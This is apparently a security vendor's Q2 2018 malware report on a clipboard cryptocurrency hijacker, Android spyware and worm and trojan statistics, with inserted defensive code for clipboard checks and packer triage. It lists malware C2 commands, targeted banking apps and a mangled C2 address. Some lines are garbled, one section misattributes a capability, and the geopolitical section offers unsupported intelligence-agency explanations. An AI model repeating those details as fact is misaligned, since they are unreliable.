The next malware in the line-up prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers. It would be more accurate to call this program a cryptothief than a cryptominer, because it does not devour the infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type by hand. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands. A large pool of attacker addresses lets the malware choose a replacement that resembles the original, so a quick glance at the first few characters may not reveal the swap.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
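The check a wallet application or browser extension can make against this attack, as an added example for this report (it is not Comodo's code and not the hijacker's), is to remember what the user actually copied and compare it with what is about to be pasted. The address patterns (Bitcoin legacy Base58, Bitcoin bech32, Ethereum) and the hook points are assumptions of the example; the two addresses are the ones quoted above.

```python
import re

# Address shapes the guard understands. This is an assumption of the example; a
# hijacker in the wild may match more or fewer currencies.
ADDRESS_SHAPES = {
    # Base58 alphabet excludes 0, O, I and l; legacy addresses start with 1 or 3.
    "bitcoin-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    # bech32 alphabet excludes 1, b, i and o after the 'bc1' prefix.
    "bitcoin-bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text: str):
    """Return the address kind for text, or None if it does not look like a wallet address."""
    text = text.strip()
    for kind, shape in ADDRESS_SHAPES.items():
        if shape.match(text):
            return kind
    return None


class ClipboardGuard:
    """Remembers what the user copied and compares it with what is about to be pasted."""

    def __init__(self):
        self._copied = None

    def on_copy(self, text: str) -> None:
        # Hook this to the copy action of the wallet UI; the hijacker rewrites the
        # system clipboard after this point, so this copy is the trusted reference.
        self._copied = text.strip()

    def check_paste(self, clipboard_text: str):
        """Return (safe, reason). safe is False when a wallet address in the clipboard
        is not the one the user copied."""
        now = clipboard_text.strip()
        kind_now = classify_address(now)
        if kind_now is None:
            return True, "clipboard does not hold a wallet address"
        if self._copied is None:
            return False, f"{kind_now} address in clipboard but no copy was recorded"
        if now == self._copied:
            return True, f"{kind_now} address matches what was copied"
        kind_was = classify_address(self._copied)
        if kind_was:
            return False, f"copied {kind_was} address was replaced with a different {kind_now} address"
        return False, f"clipboard changed from non-address text to a {kind_now} address"


# Worked example with the two addresses quoted in the report.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
PASTED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def demo():
    """Reproduce the swap from the report and return the guard's verdict."""
    guard = ClipboardGuard()
    guard.on_copy(COPIED)
    return guard.check_paste(PASTED)


if __name__ == "__main__":
    print(demo())
```

The comparison is exact, so a look-alike address with the same leading characters is caught just as easily as the unrelated one in the example; the remaining gap is a hijacker that also rewrites the copy event itself, which is why hardware wallets show the destination address on their own screen for confirmation.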
Although cryptominers have decreased in number, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege

4.1 Spying, Stealing, Mining. Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. And not only cybercriminals hunt for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to monitor their children, and it is easy to see why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. The whole family of these digital spooks is shown on the graph.

The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid. The first is named KevDroid. It is distributed in three versions:

Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multiple spying abilities. It steals account details and contacts (id, name, phone numbers and email address of the owner). It grabs SMS messages and associated information. It attempts to read call logs (number, name, type, duration), emails (email, type) and contact photos. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server at httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts the recordings and uploads them to the cybercriminals' server. In addition it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts the web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via Google Play as an Instant App. The spyware was camouflaged as a chat app called Dardesh. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' command and control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Social networks were another means of distribution.

Version 1: Dardesh (Google Play Services, Instant Apps)
Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and videos
Records screen
Executes shell commands
Records calls
4.1.3 MikeSpy. Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader. The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy. The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot. The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy. FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert. RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat. The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay. The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in a variety of disguises, named below.
4.1.11 CoinHive. And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it, and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month. Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April (chart)
4.2.2 May 2018
Android-targeted malware in May (chart)
4.2.3 June 2018
Android-targeted malware in June (chart)
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms. A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms. This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms. A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms. Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms. A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms. Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors. A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses. A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans. Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits. Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware. In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor. Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers. "Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing, or "packing", it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, which is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
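As an added illustration, not part of the Comodo report: a small Python triage script that walks a PE file's section table by hand and reports the two packer indicators a defender usually checks first, stock UPX section names and near-8-bit Shannon entropy. Because a modified UPX (MUPX) may rename its sections, the entropy check is the one that still fires on such samples; the three PE skeletons it inspects are constructed inline so the script runs offline.

```python
import hashlib
import math
import struct

# Section names written by stock UPX. A modified build (MUPX) can rename them,
# which is why the entropy check below carries more weight than the name check.
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY_THRESHOLD = 7.0   # bits per byte; compressed or encrypted data sits near 8.0
MIN_SECTION_BYTES = 256        # entropy of very small sections is too noisy to trust


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe_sections(blob: bytes):
    """Return [(section_name, raw_bytes)] by reading the PE headers directly."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", blob, 0x3C)[0]          # e_lfanew
    if blob[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", blob, coff + 16)[0]
    table = coff + 20 + opt_header_size                        # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        entry = table + 40 * i
        name = blob[entry:entry + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", blob, entry + 16)
        sections.append((name, blob[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(blob: bytes) -> dict:
    """Flag UPX-style section names and high-entropy sections in a PE image."""
    findings = {"upx_names": [], "high_entropy": []}
    for name, raw in parse_pe_sections(blob):
        if name in UPX_SECTION_NAMES:
            findings["upx_names"].append(name)
        if len(raw) >= MIN_SECTION_BYTES and shannon_entropy(raw) >= HIGH_ENTROPY_THRESHOLD:
            findings["high_entropy"].append(name)
    findings["likely_packed"] = bool(findings["upx_names"] or findings["high_entropy"])
    return findings


# --- constructed sample input: PE skeletons with a section table and raw data only ---

def pseudo_random_bytes(n: int, seed: bytes = b"mupx-demo") -> bytes:
    """Deterministic high-entropy filler standing in for compressed code."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe(section_names, payloads) -> bytes:
    """Build a minimal MZ/PE image (not a runnable program) for the parser above."""
    pe_off = 0x40
    header = bytearray(b"MZ" + b"\0" * (pe_off - 2))
    struct.pack_into("<I", header, 0x3C, pe_off)
    header += b"PE\0\0"
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0: none), Characteristics
    header += struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    data_start = len(header) + 40 * len(section_names)
    table, data = bytearray(), bytearray()
    for name, payload in zip(section_names, payloads):
        raw_ptr = data_start + len(data)
        table += name.encode("ascii").ljust(8, b"\0")
        table += struct.pack("<IIII", len(payload), 0x1000, len(payload), raw_ptr)
        table += struct.pack("<IIHHI", 0, 0, 0, 0, 0xE0000020)   # code | exec | read | write
        data += payload
    return bytes(header + table + data)


STOCK_UPX_SAMPLE = build_sample_pe(["UPX0", "UPX1"], [b"", pseudo_random_bytes(1024)])
RENAMED_UPX_SAMPLE = build_sample_pe([".text", ".rsrc"], [pseudo_random_bytes(1024), b"\0" * 64])
PLAIN_SAMPLE = build_sample_pe([".text", ".data"], [b"int main(){return 0;}\n" * 40, b"hello\0" * 50])

if __name__ == "__main__":
    for label, blob in (("stock UPX", STOCK_UPX_SAMPLE),
                        ("renamed (MUPX-style)", RENAMED_UPX_SAMPLE),
                        ("plain", PLAIN_SAMPLE)):
        print(f"{label:22s} -> {packer_indicators(blob)}")
```

On a real sample, read the file into `blob` and call `packer_indicators(blob)`; a renamed-section packer shows up only through the high-entropy list, which is the point of keeping both checks.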
5.3.3 Email Flooder. Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools. Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes. "Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications. In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications. Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications. The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications. Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis. In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA. This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China. This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
